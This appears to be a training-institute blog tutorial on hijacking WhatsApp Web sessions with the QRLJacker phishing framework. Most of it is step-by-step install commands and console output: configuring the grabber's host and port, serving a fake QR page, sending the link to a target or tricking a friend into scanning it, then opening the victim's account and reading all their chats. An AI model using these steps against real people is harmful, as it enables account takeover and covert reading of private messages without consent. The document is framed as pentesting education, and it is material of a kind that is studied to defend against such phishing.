Social Engineering attacks still works. Most of the attackers do use social engineering methods to trick targets. According to ethical hacking researcher of international institute of cyber security social engineering methods are used in QRLJacker, a tool that is used in obtaining whats app web sessions. The whole program is written in python. This tool works on principle of phishing. Phishing is a type of social engineering attack in which fake login pages or payment pages are generated to gather credentials of users.
QRLJacker is most common tool used in whatsapp session hijacking which can be helpful in initial phase of pentesting.
- For testing we have used Live Kali Linux 2019.4 amd64. While testing QrlJacker sometimes, QRLJacker was not working on installed versions of Kali linux. We have tested onLive boot of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.
- Geeko driver act as web browser engine used in applications developed by Mozilla. It creates an link between Selenium (an python module) & Mozilla browser. For installing type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
- Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
- Type sudo mv -f geckodriver /usr/local/share/geckodriver
- Type sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
- Type sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
- Remember to update firefox browser. For that type sudo apt-get update & sudo apt-get install firefox-esr
- Type apt-get install python3.7
- Type git clone https://github.com/OWASP/QRLJacking
- Type python3.7 -m pip install -r requirements.txt
- Type python3.7 QrlJacker.py
_____________________________________ !\/ ! \/ ./ !/\ ! |\ ./ ! \ ! / \ ./ ! \______!______| \ ,/ ! /\ ! ./\ ,/ ! / \ ! | \ ,/ !/ \___!____| ,/ Everything is connected, even the simplest things! ! / \ _!__ *\,/ ! ! \ ! \,/ ! ! | \! ,/ !----------K/ ! ! ,! /| QrlJacker-Framework By @D4Vinci - V2.1 ! !/ / | Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh) ! / \ / | Loaded 1 grabber(s), 0 post module(s). !\./ \/ | !/\ / | ! \ / .o. ! \/ :O: ! / " ! / ! / !/ ! ! !
- Type help
QrlJacker > help
General commands ================= Command Description --------- ------------- help/? Show this help menu. os <command> Execute a system command without closing the framework banner Display banner. exit/quit Exit the framework. Core commands ============= Command Description --------- ------------- database Prints the core version, check if framework is up-to-date and update if you are not up-to-date. debug Drop into debug mode or disable it. (Making identifying problems easier) dev Drop into development mode or disable it. (Reload modules every use) verbose Drop into verbose mode or disable it. (Make framework displays more details) reload/refresh Reload the modules database.
- Type list & type use grabber/whatsapp
QrlJacker > list
grabber/whatsapp Whatsapp QR-sessions grabber and controller
QrlJacker > use grabber/whatsapp
- Type options & type set port 1337
- Type set host 192.168.1.7
QrlJacker Module(grabber/whatsapp) > set port 1337
[+] port => 1337
QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
[+] host => 192.168.1.7
QrlJacker Module(grabber/whatsapp) > options
Name Current value Required Description
port 1337 Yes The local port to listen on.
host 192.168.1.7 Yes The local host to listen on.
useragent (default) Yes Make useragent is the (default) one, a (random) generated useragent or a specifed useragent
Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp
QrlJacker Module(grabber/whatsapp) > run
QrlJacker Module(grabber/whatsapp) > run
[+] Using the default useragent
[+] Running a thread to keep the QR image [whatsapp]
[+] Waiting for sessions on whatsapp
[+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
[+] Initializing webserver… [whatsapp]
- After starting Qrljacker server. You can send this link to your target. For testing we have opened generated QrlJacker Code on Windows 7. Type 192.168.1.7:1337
- For usage we have opened on whatsapp 2.19.98. Scan the QR code in Whatsapp web of your mobile or ask your friend to login in whatsapp web using social engineering techniques
- Go to terminal where you have started QrlJacker on Kali. Type sessions Sessions will shows connected Whats app accounts to QrlJacker sessions.
QrlJacker Module(grabber/whatsapp) > sessions
ID Module name Captured on
0 whatsapp Sat-Apr-13-04:53:03-2019
- As you type sessions -i 0, Kali Linux web browser will open with target Whatsapp account First it will open web.whatsapp.com.
- But after 1 or 2 seconds target Whatsapp account will open.
- Now you can see all the chat of whatsapp.
Practical Video on QrlJacking :-
Above video is posted by a ethical hacking student of International Institute of Cyber Security, Delhi India. In Next publish we will analyse how QRLJacker works